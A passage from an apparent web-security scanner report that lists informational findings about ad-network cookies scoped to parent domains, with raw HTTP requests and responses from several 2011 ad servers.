Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=961073&id=1146992&id=1146943&id=1146965&id=1146949&id=750331&id=643545&id=970658&id=750295&id=276802
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT

13.55. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a99/f/b2/*/d;234819764;0-0;0;55748943;4307-300/250;40168029/40185816/1;;~sscs=?http:/r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http:%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1
Set-Cookie: id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 24 Jan 2011 22:29:19 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

13.56. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=25473179&ahcid=639152&bimpd=JfYWx_x-jXNCK9IpMegyhUWfskX0pU8P9f7Q1yXyGzQemn_EqX28BMzorUm1RHhKGx-kTq2w2kpNwnvUPTFSYA_80oR-SV_VDSGrzVIaqwv7xQM1WSLXOFPtmTbFrBpcKHYDU3ZzQbGAadh-eeMHWfO4Zgq6ktzuNhF_bLK0LPbphxV42Q4h_ZsNyhD18qZoRsuasRkxi1Z1k2rPptD9P8PLpt1hXOJjICjWtT2yiK1991S-sQEpjv_uMS6ILCsrwnU36lwYe7slfVjZEaepylBgMkh3271niMXNcwzAAnkA3U_Zfy6PETxQfgT8J-eT3nHNrRxpSP9nzpJZWA2Oy_F-ABQAi523H0QKxGD94Z1KPSA4tJC98-OHWr7_Um1WZpe8EWvwpVEb2wDc62rx0S06fjS1aNldrC9NAsPnTeFe4dD9Jr8W6-GV7RTJi0dWCJlznOYZcJIyl5aWWTKHL8QbIlH3bhQ14447S7BulD2NXHmwdmZPdbayfYow3TS_3DJsjXLE29UpHD0D8hJpAOZI2lttlojyr18-kq0-aK4JBWy7dWMINLXjafqXKN-yikbmhRmyXpRqygwkLDH5nb3wc-cQ7FRKnITKYzO3zYW_xnlzUqpmXl7pHtXggKmUbVUxMzpfpDP-5pvCsEjEu9gSUaiszXPUJLnjJ5pOEcFJzTMxAkdIK6WQ3ZcMhBFc0GRnvhpqQeoi_DKnimnnEdWAtgHpEXC7-jTjtY7xtW70-FfeNmDs5wqwDfThppao&acp=TT4o8AAAtGwK5T0lMKVG2jUduhdCo64LBk_xIw&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14983%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

13.57. http://ads.adbrite.com/adserver/behavioral-data/8201 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=49,123 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z1fSUUpKzMtLLcoEK1CqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d3db691@www.hotelsbycity.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:07:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
Set-Cookie: vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.58. http://ads.doclix.com/adserver/CntImprImg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/CntImprImg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/CntImprImg?type=msg&p=MTUtMTUwLTE0Ni0xMTEtOTgtOTAtMjUwLTE2NC0yMi00OC01Ny0xMjAtMjM1LTY0LTE5LTI0NC05Ny0xMDAtMTY4LTE5My00OC0xNTgtMjUwLTE1Mi0zNS0yMjctMjAyLTI0Ny00NC0xNjEtMTQxLTE5My0yMS0zNC0yMjgtMjEtMjktMTAzLTE2MC0xNDUtNDktMTY0LTU1LTM1LTM2LTY2LTI0NC0xODMtMTMwLTMtMTAwLTE0MC0zNC0yMTItMTQ3LTE4MC0xOTItNDUtMTAwLTIwMC0xNy0xNzItMjUxLTY3LTIxOC0xNjktMTY5LTE5NC0xODEtOTktMzktNjYtMTQ0LTgtMjQtMTQtMTgyLTgxLTEzLTI2&purl=http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html&r=1998 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Set-Cookie: daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
ETag: W/"137-1288970405000"
Last-Modified: Fri, 05 Nov 2010 15:20:05 GMT
Content-Type: image/png
Vary: Accept-Encoding
Connection: close
Content-Length: 137

.PNG
.
...IHDR.............(.4.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE......U..~....tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

13.59. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...

13.60. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=K04491 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
